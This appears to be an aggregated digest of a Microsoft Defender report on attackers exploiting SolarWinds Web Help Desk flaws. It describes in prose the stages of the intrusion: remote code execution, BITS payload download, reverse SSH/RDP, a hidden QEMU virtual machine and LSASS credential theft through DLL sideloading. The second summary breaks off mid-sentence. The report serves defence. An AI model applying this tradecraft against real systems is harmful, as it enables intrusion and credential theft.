• The Microsoft Defender Research Team observed a multi‑stage intrusion where threat actors exploited internet‑exposed SolarWinds Web Help Desk (WHD) instances to get an initial foothold and then laterally moved towards other high-value assets within the organization. • However, we have not yet confirmed whether the attacks are related to the most recent set of WHD vulnerabilities disclosed on January 28, 2026, such as CVE-2025-40551 and CVE-2025-40536 or stem from previously disclosed vulnerabilities like CVE-2025-26399. • Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold. • This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored. • In this intrusion, attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms. • These tradecraft choices reinforce the importance of Defense in Depth, timely patching of internet-facing services, and behavior-based detection across identity, endpoint, and network layers.

Article Summaries:

  • Microsoft Defender’s Research Team has identified in‑the‑wild exploitation of internet‑exposed SolarWinds Web Help Desk (WHD) instances. Attackers leveraged one or more vulnerabilities (CVE‑2025‑40551, CVE‑2025‑40536, CVE‑2025‑26399) to achieve unauthenticated remote code execution, then used PowerShell and BITS to download a payload that installed a legitimate RMM tool (Zoho ManageEngine). From there they enumerated domain users, set up reverse SSH/RDP access, and created a scheduled task that launched a QEMU virtual machine under SYSTEM to hide activity. DLL sideloading via wab.exe was also used for LSASS credential theft. The investigation is ongoing, with Microsoft providing detection and hardening guidance.
  • The Microsoft Defender Research Team observed a multi‑stage intrusion where threat actors exploited internet‑exposed SolarWinds Web Help Desk (WHD) instances to get an initial foothold and then laterally moved towards other high-value assets within the organization. However, we have not yet confirmed whether the attacks are related to the most recent set of WHD vulnerabilities disclosed on January 28, 2026, such as CVE-2025-40551 and CVE-2025-40536 or stem from previously disclosed vulnerabilities like CVE-2025-26399. Since the attacks occurred in December 2025 and on machines vulnerable to bo

Sources: